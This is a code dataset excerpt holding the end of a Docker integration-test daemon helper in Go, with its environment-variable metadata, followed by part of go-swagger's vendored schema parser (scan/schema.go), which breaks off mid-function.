}
// Interrupt stops the daemon by sending it an Interrupt signal
func (d *Daemon) Interrupt() error {
return d.Signal(os.Interrupt)
}
// Signal sends the specified signal to the daemon if running
func (d *Daemon) Signal(signal os.Signal) error {
if d.cmd == nil || d.Wait == nil {
return errDaemonNotStarted
}
return d.cmd.Process.Signal(signal)
}
// DumpStackAndQuit sends SIGQUIT to the daemon, which triggers it to dump its
// stack to its log file and exit
// This is used primarily for gathering debug information on test timeout
func (d *Daemon) DumpStackAndQuit() {
if d.cmd == nil || d.cmd.Process == nil {
return
}
SignalDaemonDump(d.cmd.Process.Pid)
}
// Stop will send a SIGINT every second and wait for the daemon to stop.
// If it times out, a SIGKILL is sent.
// Stop will not delete the daemon directory. If a purged daemon is needed,
// instantiate a new one with NewDaemon.
// If an error occurs while starting the daemon, the test will fail.
func (d *Daemon) Stop(t testingT) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
err := d.StopWithError()
if err != nil {
if err != errDaemonNotStarted {
t.Fatalf("Error while stopping the daemon %s : %v", d.id, err)
} else {
t.Logf("Daemon %s is not started", d.id)
}
}
}
// StopWithError will send a SIGINT every second and wait for the daemon to stop.
// If it timeouts, a SIGKILL is sent.
// Stop will not delete the daemon directory. If a purged daemon is needed,
// instantiate a new one with NewDaemon.
func (d *Daemon) StopWithError() error {
if d.cmd == nil || d.Wait == nil {
return errDaemonNotStarted
}
defer func() {
d.logFile.Close()
d.cmd = nil
}()
i := 1
tick := time.Tick(time.Second)
if err := d.cmd.Process.Signal(os.Interrupt); err != nil {
if strings.Contains(err.Error(), "os: process already finished") {
return errDaemonNotStarted
}
return errors.Errorf("could not send signal: %v", err)
}
out1:
for {
select {
case err := <-d.Wait:
return err
case <-time.After(20 * time.Second):
// time for stopping jobs and run onShutdown hooks
d.log.Logf("[%s] daemon stop timeout", d.id)
break out1
}
}
out2:
for {
select {
case err := <-d.Wait:
return err
case <-tick:
i++
if i > 5 {
d.log.Logf("tried to interrupt daemon for %d times, now try to kill it", i)
break out2
}
d.log.Logf("Attempt #%d: daemon is still running with pid %d", i, d.cmd.Process.Pid)
if err := d.cmd.Process.Signal(os.Interrupt); err != nil {
return errors.Errorf("could not send signal: %v", err)
}
}
}
if err := d.cmd.Process.Kill(); err != nil {
d.log.Logf("Could not kill daemon: %v", err)
return err
}
d.cmd.Wait()
return os.Remove(fmt.Sprintf("%s/docker.pid", d.Folder))
}
// Restart will restart the daemon by first stopping it and the starting it.
// If an error occurs while starting the daemon, the test will fail.
func (d *Daemon) Restart(t testingT, args ...string) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
d.Stop(t)
d.Start(t, args...)
}
// RestartWithError will restart the daemon by first stopping it and then starting it.
func (d *Daemon) RestartWithError(arg ...string) error {
if err := d.StopWithError(); err != nil {
return err
}
return d.StartWithError(arg...)
}
func (d *Daemon) handleUserns() {
// in the case of tests running a user namespace-enabled daemon, we have resolved
// d.Root to be the actual final path of the graph dir after the "uid.gid" of
// remapped root is added--we need to subtract it from the path before calling
// start or else we will continue making subdirectories rather than truly restarting
// with the same location/root:
if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
d.Root = filepath.Dir(d.Root)
}
}
// ReloadConfig asks the daemon to reload its configuration
func (d *Daemon) ReloadConfig() error {
if d.cmd == nil || d.cmd.Process == nil {
return errors.New("daemon is not running")
}
errCh := make(chan error)
started := make(chan struct{})
go func() {
_, body, err := request.Get("/events", request.Host(d.Sock()))
close(started)
if err != nil {
errCh <- err
}
defer body.Close()
dec := json.NewDecoder(body)
for {
var e events.Message
if err := dec.Decode(&e); err != nil {
errCh <- err
return
}
if e.Type != events.DaemonEventType {
continue
}
if e.Action != "reload" {
continue
}
close(errCh) // notify that we are done
return
}
}()
<-started
if err := signalDaemonReload(d.cmd.Process.Pid); err != nil {
return errors.Errorf("error signaling daemon reload: %v", err)
}
select {
case err := <-errCh:
if err != nil {
return errors.Errorf("error waiting for daemon reload event: %v", err)
}
case <-time.After(30 * time.Second):
return errors.New("timeout waiting for daemon reload event")
}
return nil
}
// LoadBusybox image into the daemon
func (d *Daemon) LoadBusybox(t assert.TestingT) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
clientHost, err := client.NewEnvClient()
assert.NilError(t, err, "failed to create client")
defer clientHost.Close()
ctx := context.Background()
reader, err := clientHost.ImageSave(ctx, []string{"busybox:latest"})
assert.NilError(t, err, "failed to download busybox")
defer reader.Close()
client, err := d.NewClient()
assert.NilError(t, err, "failed to create client")
defer client.Close()
resp, err := client.ImageLoad(ctx, reader, true)
assert.NilError(t, err, "failed to load busybox")
defer resp.Body.Close()
}
func (d *Daemon) getClientConfig() (*clientConfig, error) {
var (
transport *http.Transport
scheme string
addr string
proto string
)
if d.UseDefaultTLSHost {
option := &tlsconfig.Options{
CAFile: "fixtures/https/ca.pem",
CertFile: "fixtures/https/client-cert.pem",
KeyFile: "fixtures/https/client-key.pem",
}
tlsConfig, err := tlsconfig.Client(*option)
if err != nil {
return nil, err
}
transport = &http.Transport{
TLSClientConfig: tlsConfig,
}
addr = fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort)
scheme = "https"
proto = "tcp"
} else if d.UseDefaultHost {
addr = opts.DefaultUnixSocket
proto = "unix"
scheme = "http"
transport = &http.Transport{}
} else {
addr = d.sockPath()
proto = "unix"
scheme = "http"
transport = &http.Transport{}
}
if err := sockets.ConfigureTransport(transport, proto, addr); err != nil {
return nil, err
}
transport.DisableKeepAlives = true
return &clientConfig{
transport: transport,
scheme: scheme,
addr: addr,
}, nil
}
func (d *Daemon) queryRootDir() (string, error) {
// update daemon root by asking /info endpoint (to support user
// namespaced daemon with root remapped uid.gid directory)
clientConfig, err := d.getClientConfig()
if err != nil {
return "", err
}
client := &http.Client{
Transport: clientConfig.transport,
}
req, err := http.NewRequest("GET", "/info", nil)
if err != nil {
return "", err
}
req.Header.Set("Content-Type", "application/json")
req.URL.Host = clientConfig.addr
req.URL.Scheme = clientConfig.scheme
resp, err := client.Do(req)
if err != nil {
return "", err
}
body := ioutils.NewReadCloserWrapper(resp.Body, func() error {
return resp.Body.Close()
})
type Info struct {
DockerRootDir string
}
var b []byte
var i Info
b, err = request.ReadBody(body)
if err == nil && resp.StatusCode == http.StatusOK {
// read the docker root dir
if err = json.Unmarshal(b, &i); err == nil {
return i.DockerRootDir, nil
}
}
return "", err
}
// Info returns the info struct for this daemon
func (d *Daemon) Info(t assert.TestingT) types.Info {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
apiclient, err := d.NewClient()
assert.NilError(t, err)
info, err := apiclient.Info(context.Background())
assert.NilError(t, err)
return info
}
func cleanupRaftDir(t testingT, rootPath string) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
walDir := filepath.Join(rootPath, "swarm/raft/wal")
if err := os.RemoveAll(walDir); err != nil {
t.Logf("error removing %v: %v", walDir, err)
}
}
|
[
"\"DOCKER_INTEGRATION_DAEMON_DEST\"",
"\"DEST\"",
"\"DOCKER_GRAPHDRIVER\"",
"\"DOCKER_USERLANDPROXY\"",
"\"DOCKER_REMAP_ROOT\"",
"\"DOCKER_REMAP_ROOT\""
] |
[] |
[
"DOCKER_REMAP_ROOT",
"DOCKER_USERLANDPROXY",
"DOCKER_INTEGRATION_DAEMON_DEST",
"DOCKER_GRAPHDRIVER",
"DEST"
] |
[]
|
["DOCKER_REMAP_ROOT", "DOCKER_USERLANDPROXY", "DOCKER_INTEGRATION_DAEMON_DEST", "DOCKER_GRAPHDRIVER", "DEST"]
|
go
| 5 | 0 | |
golang/vendor/github.com/go-swagger/go-swagger/scan/schema.go
|
// Copyright 2015 go-swagger maintainers
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package scan
import (
"fmt"
"go/ast"
"log"
"os"
"path/filepath"
"reflect"
"runtime"
"strconv"
"strings"
"golang.org/x/tools/go/loader"
"github.com/go-openapi/spec"
)
type schemaTypable struct {
schema *spec.Schema
level int
}
func (st schemaTypable) Typed(tpe, format string) {
st.schema.Typed(tpe, format)
}
func (st schemaTypable) SetRef(ref spec.Ref) {
st.schema.Ref = ref
}
func (st schemaTypable) Schema() *spec.Schema {
return st.schema
}
func (st schemaTypable) Items() swaggerTypable {
if st.schema.Items == nil {
st.schema.Items = new(spec.SchemaOrArray)
}
if st.schema.Items.Schema == nil {
st.schema.Items.Schema = new(spec.Schema)
}
st.schema.Typed("array", "")
return schemaTypable{st.schema.Items.Schema, st.level + 1}
}
func (st schemaTypable) AdditionalProperties() swaggerTypable {
if st.schema.AdditionalProperties == nil {
st.schema.AdditionalProperties = new(spec.SchemaOrBool)
}
if st.schema.AdditionalProperties.Schema == nil {
st.schema.AdditionalProperties.Schema = new(spec.Schema)
}
st.schema.Typed("object", "")
return schemaTypable{st.schema.AdditionalProperties.Schema, st.level + 1}
}
func (st schemaTypable) Level() int { return st.level }
type schemaValidations struct {
current *spec.Schema
}
func (sv schemaValidations) SetMaximum(val float64, exclusive bool) {
sv.current.Maximum = &val
sv.current.ExclusiveMaximum = exclusive
}
func (sv schemaValidations) SetMinimum(val float64, exclusive bool) {
sv.current.Minimum = &val
sv.current.ExclusiveMinimum = exclusive
}
func (sv schemaValidations) SetMultipleOf(val float64) { sv.current.MultipleOf = &val }
func (sv schemaValidations) SetMinItems(val int64) { sv.current.MinItems = &val }
func (sv schemaValidations) SetMaxItems(val int64) { sv.current.MaxItems = &val }
func (sv schemaValidations) SetMinLength(val int64) { sv.current.MinLength = &val }
func (sv schemaValidations) SetMaxLength(val int64) { sv.current.MaxLength = &val }
func (sv schemaValidations) SetPattern(val string) { sv.current.Pattern = val }
func (sv schemaValidations) SetUnique(val bool) { sv.current.UniqueItems = val }
func (sv schemaValidations) SetDefault(val interface{}) { sv.current.Default = val }
func (sv schemaValidations) SetEnum(val string) {
list := strings.Split(val, ",")
interfaceSlice := make([]interface{}, len(list))
for i, d := range list {
interfaceSlice[i] = d
}
sv.current.Enum = interfaceSlice
}
type schemaDecl struct {
File *ast.File
Decl *ast.GenDecl
TypeSpec *ast.TypeSpec
GoName string
Name string
annotated bool
}
func newSchemaDecl(file *ast.File, decl *ast.GenDecl, ts *ast.TypeSpec) *schemaDecl {
sd := &schemaDecl{
File: file,
Decl: decl,
TypeSpec: ts,
}
sd.inferNames()
return sd
}
func (sd *schemaDecl) hasAnnotation() bool {
sd.inferNames()
return sd.annotated
}
func (sd *schemaDecl) inferNames() (goName string, name string) {
if sd.GoName != "" {
goName, name = sd.GoName, sd.Name
return
}
goName = sd.TypeSpec.Name.Name
name = goName
if sd.Decl.Doc != nil {
DECLS:
for _, cmt := range sd.Decl.Doc.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxModelOverride.FindStringSubmatch(ln)
if len(matches) > 0 {
sd.annotated = true
}
if len(matches) > 1 && len(matches[1]) > 0 {
name = matches[1]
break DECLS
}
}
}
}
sd.GoName = goName
sd.Name = name
return
}
type schemaParser struct {
program *loader.Program
postDecls []schemaDecl
known map[string]spec.Schema
discovered *schemaDecl
}
func newSchemaParser(prog *loader.Program) *schemaParser {
scp := new(schemaParser)
scp.program = prog
scp.known = make(map[string]spec.Schema)
return scp
}
func (scp *schemaParser) Parse(gofile *ast.File, target interface{}) error {
tgt := target.(map[string]spec.Schema)
for _, decl := range gofile.Decls {
gd, ok := decl.(*ast.GenDecl)
if !ok {
continue
}
for _, spc := range gd.Specs {
if ts, ok := spc.(*ast.TypeSpec); ok {
sd := newSchemaDecl(gofile, gd, ts)
if err := scp.parseDecl(tgt, sd); err != nil {
return err
}
}
}
}
return nil
}
func (scp *schemaParser) parseDecl(definitions map[string]spec.Schema, decl *schemaDecl) error {
// check if there is a swagger:model tag that is followed by a word,
// this word is the type name for swagger
// the package and type are recorded in the extensions
// once type name is found convert it to a schema, by looking up the schema in the
// definitions dictionary that got passed into this parse method
// if our schemaParser is parsing a discovered schemaDecl and it does not match
// the current schemaDecl we can skip parsing.
if scp.discovered != nil && scp.discovered.Name != decl.Name {
return nil
}
decl.inferNames()
schema := definitions[decl.Name]
schPtr := &schema
// analyze doc comment for the model
sp := new(sectionedParser)
sp.setTitle = func(lines []string) { schema.Title = joinDropLast(lines) }
sp.setDescription = func(lines []string) { schema.Description = joinDropLast(lines) }
if err := sp.Parse(decl.Decl.Doc); err != nil {
return err
}
// if the type is marked to ignore, just return
if sp.ignored {
return nil
}
// analyze struct body for fields etc
// each exported struct field:
// * gets a type mapped to a go primitive
// * perhaps gets a format
// * has to document the validations that apply for the type and the field
// * when the struct field points to a model it becomes a ref: #/definitions/ModelName
// * the first line of the comment is the title
// * the following lines are the description
switch tpe := decl.TypeSpec.Type.(type) {
case *ast.StructType:
if err := scp.parseStructType(decl.File, schPtr, tpe, make(map[string]string)); err != nil {
return err
}
case *ast.InterfaceType:
if err := scp.parseInterfaceType(decl.File, schPtr, tpe, make(map[string]string)); err != nil {
return err
}
case *ast.Ident:
prop := &schemaTypable{schPtr, 0}
if strfmtName, ok := strfmtName(decl.Decl.Doc); ok {
prop.Typed("string", strfmtName)
} else {
if err := scp.parseNamedType(decl.File, tpe, prop); err != nil {
return err
}
}
case *ast.SelectorExpr:
prop := &schemaTypable{schPtr, 0}
if strfmtName, ok := strfmtName(decl.Decl.Doc); ok {
prop.Typed("string", strfmtName)
} else {
if err := scp.parseNamedType(decl.File, tpe, prop); err != nil {
return err
}
}
case *ast.ArrayType:
prop := &schemaTypable{schPtr, 0}
if strfmtName, ok := strfmtName(decl.Decl.Doc); ok {
prop.Items().Typed("string", strfmtName)
} else {
if err := scp.parseNamedType(decl.File, tpe, &schemaTypable{schPtr, 0}); err != nil {
return err
}
}
case *ast.MapType:
prop := &schemaTypable{schPtr, 0}
if strfmtName, ok := strfmtName(decl.Decl.Doc); ok {
prop.AdditionalProperties().Typed("string", strfmtName)
} else {
if err := scp.parseNamedType(decl.File, tpe, &schemaTypable{schPtr, 0}); err != nil {
return err
}
}
default:
log.Printf("WARNING: Missing parser for a %T, skipping model: %s\n", tpe, decl.Name)
return nil
}
if schPtr.Ref.String() == "" {
if decl.Name != decl.GoName {
schPtr.AddExtension("x-go-name", decl.GoName)
}
for _, pkgInfo := range scp.program.AllPackages {
if pkgInfo.Importable {
for _, fil := range pkgInfo.Files {
if fil.Pos() == decl.File.Pos() {
schPtr.AddExtension("x-go-package", pkgInfo.Pkg.Path())
}
}
}
}
}
definitions[decl.Name] = schema
return nil
}
func (scp *schemaParser) parseNamedType(gofile *ast.File, expr ast.Expr, prop swaggerTypable) error {
switch ftpe := expr.(type) {
case *ast.Ident: // simple value
pkg, err := scp.packageForFile(gofile, ftpe)
if err != nil {
return err
}
return scp.parseIdentProperty(pkg, ftpe, prop)
case *ast.StarExpr: // pointer to something, optional by default
if err := scp.parseNamedType(gofile, ftpe.X, prop); err != nil {
return err
}
case *ast.ArrayType: // slice type
if err := scp.parseNamedType(gofile, ftpe.Elt, prop.Items()); err != nil {
return err
}
case *ast.StructType:
schema := prop.Schema()
if schema == nil {
return fmt.Errorf("items doesn't support embedded structs")
}
return scp.parseStructType(gofile, prop.Schema(), ftpe, make(map[string]string))
case *ast.SelectorExpr:
err := scp.typeForSelector(gofile, ftpe, prop)
return err
case *ast.MapType:
// check if key is a string type, if not print a message
// and skip the map property. Only maps with string keys can go into additional properties
sch := prop.Schema()
if sch == nil {
return fmt.Errorf("items doesn't support maps")
}
if keyIdent, ok := ftpe.Key.(*ast.Ident); sch != nil && ok {
if keyIdent.Name == "string" {
if sch.AdditionalProperties == nil {
sch.AdditionalProperties = new(spec.SchemaOrBool)
}
sch.AdditionalProperties.Allows = false
if sch.AdditionalProperties.Schema == nil {
sch.AdditionalProperties.Schema = new(spec.Schema)
}
if err := scp.parseNamedType(gofile, ftpe.Value, schemaTypable{sch.AdditionalProperties.Schema, 0}); err != nil {
return err
}
sch.Typed("object", "")
}
}
case *ast.InterfaceType:
prop.Schema().Typed("object", "")
default:
pos := "unknown file:unknown position"
if scp != nil {
if scp.program != nil {
if scp.program.Fset != nil {
pos = scp.program.Fset.Position(expr.Pos()).String()
}
}
}
return fmt.Errorf("expr (%s) is unsupported for a schema", pos)
}
return nil
}
func (scp *schemaParser) parseEmbeddedType(gofile *ast.File, schema *spec.Schema, expr ast.Expr, seenPreviously map[string]string) error {
switch tpe := expr.(type) {
case *ast.Ident:
// do lookup of type
// take primitives into account, they should result in an error for swagger
pkg, err := scp.packageForFile(gofile, tpe)
if err != nil {
return err
}
file, _, ts, err := findSourceFile(pkg, tpe.Name)
if err != nil {
return err
}
switch st := ts.Type.(type) {
case *ast.StructType:
return scp.parseStructType(file, schema, st, seenPreviously)
case *ast.InterfaceType:
return scp.parseInterfaceType(file, schema, st, seenPreviously)
default:
prop := &schemaTypable{schema, 0}
return scp.parseNamedType(gofile, st, prop)
}
case *ast.SelectorExpr:
// look up package, file and then type
pkg, err := scp.packageForSelector(gofile, tpe.X)
if err != nil {
return fmt.Errorf("embedded struct: %v", err)
}
file, _, ts, err := findSourceFile(pkg, tpe.Sel.Name)
if err != nil {
return fmt.Errorf("embedded struct: %v", err)
}
if st, ok := ts.Type.(*ast.StructType); ok {
return scp.parseStructType(file, schema, st, seenPreviously)
}
if st, ok := ts.Type.(*ast.InterfaceType); ok {
return scp.parseInterfaceType(file, schema, st, seenPreviously)
}
case *ast.StarExpr:
return scp.parseEmbeddedType(gofile, schema, tpe.X, seenPreviously)
default:
return fmt.Errorf(
"parseEmbeddedType: unsupported type %v at position %#v",
expr,
scp.program.Fset.Position(tpe.Pos()),
)
}
return fmt.Errorf("unable to resolve embedded struct for: %v", expr)
}
func (scp *schemaParser) parseAllOfMember(gofile *ast.File, schema *spec.Schema, expr ast.Expr, seenPreviously map[string]string) error {
// TODO: check if struct is annotated with swagger:model or known in the definitions otherwise
var pkg *loader.PackageInfo
var file *ast.File
var gd *ast.GenDecl
var ts *ast.TypeSpec
var err error
switch tpe := expr.(type) {
case *ast.Ident:
// do lookup of type
// take primitives into account, they should result in an error for swagger
pkg, err = scp.packageForFile(gofile, tpe)
if err != nil {
return err
}
file, gd, ts, err = findSourceFile(pkg, tpe.Name)
if err != nil {
return err
}
case *ast.SelectorExpr:
// look up package, file and then type
pkg, err = scp.packageForSelector(gofile, tpe.X)
if err != nil {
return fmt.Errorf("embedded struct: %v", err)
}
file, gd, ts, err = findSourceFile(pkg, tpe.Sel.Name)
if err != nil {
return fmt.Errorf("embedded struct: %v", err)
}
default:
return fmt.Errorf("unable to resolve allOf member for: %v", expr)
}
sd := newSchemaDecl(file, gd, ts)
if sd.hasAnnotation() && pkg.String() != "time" && ts.Name.Name != "Time" {
ref, err := spec.NewRef("#/definitions/" + sd.Name)
if err != nil {
return err
}
schema.Ref = ref
scp.postDecls = append(scp.postDecls, *sd)
} else {
switch st := ts.Type.(type) {
case *ast.StructType:
return scp.parseStructType(file, schema, st, seenPreviously)
case *ast.InterfaceType:
return scp.parseInterfaceType(file, schema, st, seenPreviously)
}
}
return nil
}
func (scp *schemaParser) parseInterfaceType(gofile *ast.File, bschema *spec.Schema, tpe *ast.InterfaceType, seenPreviously map[string]string) error {
if tpe.Methods == nil {
return nil
}
// first check if this has embedded interfaces, if so make sure to refer to those by ref
// when they are decorated with an allOf annotation
// go over the method list again and this time collect the nullary methods and parse the comments
// as if they are properties on a struct
var schema *spec.Schema
seenProperties := seenPreviously
hasAllOf := false
for _, fld := range tpe.Methods.List {
if len(fld.Names) == 0 {
// if this created an allOf property then we have to rejig the schema var
// because all the fields collected that aren't from embedded structs should go in
// their own proper schema
// first process embedded structs in order of embedding
if allOfMember(fld.Doc) {
hasAllOf = true
if schema == nil {
schema = new(spec.Schema)
}
var newSch spec.Schema
// when the embedded struct is annotated with swagger:allOf it will be used as allOf property
// otherwise the fields will just be included as normal properties
if err := scp.parseAllOfMember(gofile, &newSch, fld.Type, seenProperties); err != nil {
return err
}
if fld.Doc != nil {
for _, cmt := range fld.Doc.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxAllOf.FindStringSubmatch(ln)
ml := len(matches)
if ml > 1 {
mv := matches[ml-1]
if mv != "" {
bschema.AddExtension("x-class", mv)
}
}
}
}
}
bschema.AllOf = append(bschema.AllOf, newSch)
continue
}
var newSch spec.Schema
// when the embedded struct is annotated with swagger:allOf it will be used as allOf property
// otherwise the fields will just be included as normal properties
if err := scp.parseEmbeddedType(gofile, &newSch, fld.Type, seenProperties); err != nil {
return err
}
bschema.AllOf = append(bschema.AllOf, newSch)
hasAllOf = true
}
}
if schema == nil {
schema = bschema
}
// then add and possibly override values
if schema.Properties == nil {
schema.Properties = make(map[string]spec.Schema)
}
schema.Typed("object", "")
for _, fld := range tpe.Methods.List {
if mtpe, ok := fld.Type.(*ast.FuncType); ok && mtpe.Params.NumFields() == 0 && mtpe.Results.NumFields() == 1 {
gnm := fld.Names[0].Name
nm := gnm
if fld.Doc != nil {
for _, cmt := range fld.Doc.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxName.FindStringSubmatch(ln)
ml := len(matches)
if ml > 1 {
nm = matches[ml-1]
}
}
}
}
ps := schema.Properties[nm]
if err := parseProperty(scp, gofile, mtpe.Results.List[0].Type, schemaTypable{&ps, 0}); err != nil {
return err
}
if err := scp.createParser(nm, schema, &ps, fld).Parse(fld.Doc); err != nil {
return err
}
if ps.Ref.String() == "" && nm != gnm {
ps.AddExtension("x-go-name", gnm)
}
seenProperties[nm] = gnm
schema.Properties[nm] = ps
}
}
if schema != nil && hasAllOf && len(schema.Properties) > 0 {
bschema.AllOf = append(bschema.AllOf, *schema)
}
for k := range schema.Properties {
if _, ok := seenProperties[k]; !ok {
delete(schema.Properties, k)
}
}
return nil
}
func (scp *schemaParser) parseStructType(gofile *ast.File, bschema *spec.Schema, tpe *ast.StructType, seenPreviously map[string]string) error {
if tpe.Fields == nil {
return nil
}
var schema *spec.Schema
seenProperties := seenPreviously
hasAllOf := false
for _, fld := range tpe.Fields.List {
if len(fld.Names) == 0 {
_, ignore, err := parseJSONTag(fld)
if err != nil {
return err
}
if ignore {
continue
}
// if this created an allOf property then we have to rejig the schema var
// because all the fields collected that aren't from embedded structs should go in
// their own proper schema
// first process embedded structs in order of embedding
if allOfMember(fld.Doc) {
hasAllOf = true
if schema == nil {
schema = new(spec.Schema)
}
var newSch spec.Schema
// when the embedded struct is annotated with swagger:allOf it will be used as allOf property
// otherwise the fields will just be included as normal properties
if err := scp.parseAllOfMember(gofile, &newSch, fld.Type, seenProperties); err != nil {
return err
}
if fld.Doc != nil {
for _, cmt := range fld.Doc.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxAllOf.FindStringSubmatch(ln)
ml := len(matches)
if ml > 1 {
mv := matches[ml-1]
if mv != "" {
bschema.AddExtension("x-class", mv)
}
}
}
}
}
bschema.AllOf = append(bschema.AllOf, newSch)
continue
}
if schema == nil {
schema = bschema
}
// when the embedded struct is annotated with swagger:allOf it will be used as allOf property
// otherwise the fields will just be included as normal properties
if err := scp.parseEmbeddedType(gofile, schema, fld.Type, seenProperties); err != nil {
return err
}
}
}
if schema == nil {
schema = bschema
}
// then add and possibly override values
if schema.Properties == nil {
schema.Properties = make(map[string]spec.Schema)
}
schema.Typed("object", "")
for _, fld := range tpe.Fields.List {
if len(fld.Names) > 0 && fld.Names[0] != nil && fld.Names[0].IsExported() {
gnm := fld.Names[0].Name
nm, ignore, err := parseJSONTag(fld)
if err != nil {
return err
}
if ignore {
for seenTagName, seenFieldName := range seenPreviously {
if seenFieldName == gnm {
delete(schema.Properties, seenTagName)
break
}
}
continue
}
ps := schema.Properties[nm]
if err := parseProperty(scp, gofile, fld.Type, schemaTypable{&ps, 0}); err != nil {
return err
}
if strfmtName, ok := strfmtName(fld.Doc); ok {
ps.Typed("string", strfmtName)
ps.Ref = spec.Ref{}
}
if err := scp.createParser(nm, schema, &ps, fld).Parse(fld.Doc); err != nil {
return err
}
if ps.Ref.String() == "" && nm != gnm {
ps.AddExtension("x-go-name", gnm)
}
// we have 2 cases:
// 1. field with different name override tag
// 2. field with different name removes tag
// so we need to save both tag&name
seenProperties[nm] = gnm
schema.Properties[nm] = ps
}
}
if schema != nil && hasAllOf && len(schema.Properties) > 0 {
bschema.AllOf = append(bschema.AllOf, *schema)
}
for k := range schema.Properties {
if _, ok := seenProperties[k]; !ok {
delete(schema.Properties, k)
}
}
return nil
}
func (scp *schemaParser) createParser(nm string, schema, ps *spec.Schema, fld *ast.Field) *sectionedParser {
sp := new(sectionedParser)
schemeType, err := ps.Type.MarshalJSON()
if err != nil {
return nil
}
if ps.Ref.String() == "" {
sp.setDescription = func(lines []string) { ps.Description = joinDropLast(lines) }
sp.taggers = []tagParser{
newSingleLineTagParser("maximum", &setMaximum{schemaValidations{ps}, rxf(rxMaximumFmt, "")}),
newSingleLineTagParser("minimum", &setMinimum{schemaValidations{ps}, rxf(rxMinimumFmt, "")}),
newSingleLineTagParser("multipleOf", &setMultipleOf{schemaValidations{ps}, rxf(rxMultipleOfFmt, "")}),
newSingleLineTagParser("minLength", &setMinLength{schemaValidations{ps}, rxf(rxMinLengthFmt, "")}),
newSingleLineTagParser("maxLength", &setMaxLength{schemaValidations{ps}, rxf(rxMaxLengthFmt, "")}),
newSingleLineTagParser("pattern", &setPattern{schemaValidations{ps}, rxf(rxPatternFmt, "")}),
newSingleLineTagParser("minItems", &setMinItems{schemaValidations{ps}, rxf(rxMinItemsFmt, "")}),
newSingleLineTagParser("maxItems", &setMaxItems{schemaValidations{ps}, rxf(rxMaxItemsFmt, "")}),
newSingleLineTagParser("unique", &setUnique{schemaValidations{ps}, rxf(rxUniqueFmt, "")}),
newSingleLineTagParser("enum", &setEnum{schemaValidations{ps}, rxf(rxEnumFmt, "")}),
newSingleLineTagParser("default", &setDefault{&spec.SimpleSchema{Type: string(schemeType)}, schemaValidations{ps}, rxf(rxDefaultFmt, "")}),
newSingleLineTagParser("required", &setRequiredSchema{schema, nm}),
newSingleLineTagParser("readOnly", &setReadOnlySchema{ps}),
newSingleLineTagParser("discriminator", &setDiscriminator{schema, nm}),
}
itemsTaggers := func(items *spec.Schema, level int) []tagParser {
schemeType, err := items.Type.MarshalJSON()
if err != nil {
return nil
}
// the expression is 1-index based not 0-index
itemsPrefix := fmt.Sprintf(rxItemsPrefixFmt, level+1)
return []tagParser{
newSingleLineTagParser(fmt.Sprintf("items%dMaximum", level), &setMaximum{schemaValidations{items}, rxf(rxMaximumFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMinimum", level), &setMinimum{schemaValidations{items}, rxf(rxMinimumFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMultipleOf", level), &setMultipleOf{schemaValidations{items}, rxf(rxMultipleOfFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMinLength", level), &setMinLength{schemaValidations{items}, rxf(rxMinLengthFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMaxLength", level), &setMaxLength{schemaValidations{items}, rxf(rxMaxLengthFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dPattern", level), &setPattern{schemaValidations{items}, rxf(rxPatternFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMinItems", level), &setMinItems{schemaValidations{items}, rxf(rxMinItemsFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMaxItems", level), &setMaxItems{schemaValidations{items}, rxf(rxMaxItemsFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dUnique", level), &setUnique{schemaValidations{items}, rxf(rxUniqueFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dEnum", level), &setEnum{schemaValidations{items}, rxf(rxEnumFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dDefault", level), &setDefault{&spec.SimpleSchema{Type: string(schemeType)}, schemaValidations{items}, rxf(rxDefaultFmt, itemsPrefix)}),
}
}
var parseArrayTypes func(expr ast.Expr, items *spec.SchemaOrArray, level int) ([]tagParser, error)
parseArrayTypes = func(expr ast.Expr, items *spec.SchemaOrArray, level int) ([]tagParser, error) {
if items == nil || items.Schema == nil {
return []tagParser{}, nil
}
switch iftpe := expr.(type) {
case *ast.ArrayType:
eleTaggers := itemsTaggers(items.Schema, level)
sp.taggers = append(eleTaggers, sp.taggers...)
otherTaggers, err := parseArrayTypes(iftpe.Elt, items.Schema.Items, level+1)
if err != nil {
return nil, err
}
return otherTaggers, nil
case *ast.Ident:
taggers := []tagParser{}
if iftpe.Obj == nil {
taggers = itemsTaggers(items.Schema, level)
}
otherTaggers, err := parseArrayTypes(expr, items.Schema.Items, level+1)
if err != nil {
return nil, err
}
return append(taggers, otherTaggers...), nil
case *ast.StarExpr:
otherTaggers, err := parseArrayTypes(iftpe.X, items, level)
if err != nil {
return nil, err
}
return otherTaggers, nil
default:
return nil, fmt.Errorf("unknown field type ele for %q", nm)
}
}
// check if this is a primitive, if so parse the validations from the
// doc comments of the slice declaration.
if ftped, ok := fld.Type.(*ast.ArrayType); ok {
taggers, err := parseArrayTypes(ftped.Elt, ps.Items, 0)
if err != nil {
return sp
}
sp.taggers = append(taggers, sp.taggers...)
}
} else {
sp.taggers = []tagParser{
